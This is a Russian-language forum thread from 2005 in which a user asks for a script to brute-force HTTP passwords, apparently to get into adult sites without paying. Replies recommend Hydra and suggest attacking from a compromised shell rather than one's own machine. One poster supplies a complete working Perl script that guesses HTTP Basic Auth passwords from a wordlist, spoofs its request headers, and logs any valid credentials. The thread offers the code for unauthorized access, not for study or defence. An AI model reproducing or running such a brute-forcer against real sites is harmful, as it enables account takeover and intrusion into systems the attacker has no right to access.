PDA

Просмотр полной версии : Подбор паролей к Xxx


dim_ok
07.05.2005, 16:32
Кто нибудь знает где можно достать скрипт для подбора паролей по http на PHP или Perl'e. Заранее благодарен!

Kr@b!
08.05.2005, 20:13
Задай вопрос на securitylab.ru, там подскажут, только все указывай конкретно и выкладывай как можно больше информации об объекте!!!

k00p3r
01.06.2005, 19:22
а чем те Hydra не нравится???лучший брутфорс.ищи через поисковик....

dim_ok
18.06.2005, 23:49
а чем те Hydra не нравится???лучший брутфорс.ищи через поисковик....
Со своего компа брутить - это не дело.

m0nzt3r
19.06.2005, 00:00
необязательно со своего компа можно и с шелла)
вот скриптик на перле
#!/usr/bin/perl

use MIME::Base64;
use IO::Socket;

if(@ARGV < 5)
{
print q(
.:: Skides DiGiTaL Security ::.
------------------------------------
HTTP-Basic brutforce by rav3n!
Usage: SHTTP.pl [HOST] [PORT] [DIR] [USER] [DIC]
);

exit 0;
}

$server = $ARGV[0];
$port = $ARGV[1];
$dir = $ARGV[2];
$user = $ARGV[3];
$words = $ARGV[4];

$foundpass = "success.log";
$nowcheck = "now.log";

open(FILE, "$words") || die print "$!\n";

while($pass = <FILE>)
{
$i++;
chomp($pass);

open(NOW,">$nowcheck") || die print "$!\n";
print NOW "now $user:$pass -> check $i item\n";
close NOW;

$access = encode_base64("$user\:$pass");
chomp($access);

$socket=IO::Socket::INET->new(
PeerAddr => $server,
PeerPort => $port,
Photo => tcp
)

|| die print "Unable to connect to $server:$port\n";

print $socket "GET $dir HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Referer: http://microsoft.com/\n";
print $socket "User-Agent: Internet Explorer 6.0\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Authorization: Basic $access\n";
print $socket "Connection: close\n\n";

while(<$socket>)
{
if(/(HTTP\/1\.[0-1]\s200\sOK)/)
{
open(FILE,">$foundpass") || die print "$!\n";
print FILE "SUCCESS!!! valid $user:$pass";
close FILE;
unlink($nowcheck);
exit 0;
}

}

close $socket;
}

dim_ok
19.06.2005, 00:03
ща попробуем перловый.

KEZ
19.06.2005, 12:30
перенесено в PHP,Perl,MySQL
так как к халяве никакого отношения не имеет и название XXX тут не причем

t4k
07.07.2005, 02:29
Блин, а я то подумал что порнушку нахаляву дадут посмотреть... :d
Ну да ладно, скажу только что брутфорс на перле или пхп это не дело, ты быстрее с того-же самого диалапа гидрой пароль подберёшь или через шелл на серваке, тем более что на многих хостах стоит ограничение на время выполнения скриптов.

dim_ok
07.07.2005, 23:46
Ну да ладно, скажу только что брутфорс на перле или пхп это не дело, ты быстрее с того-же самого диалапа гидрой пароль подберёшь
Так я и не куда не тороплюсь :)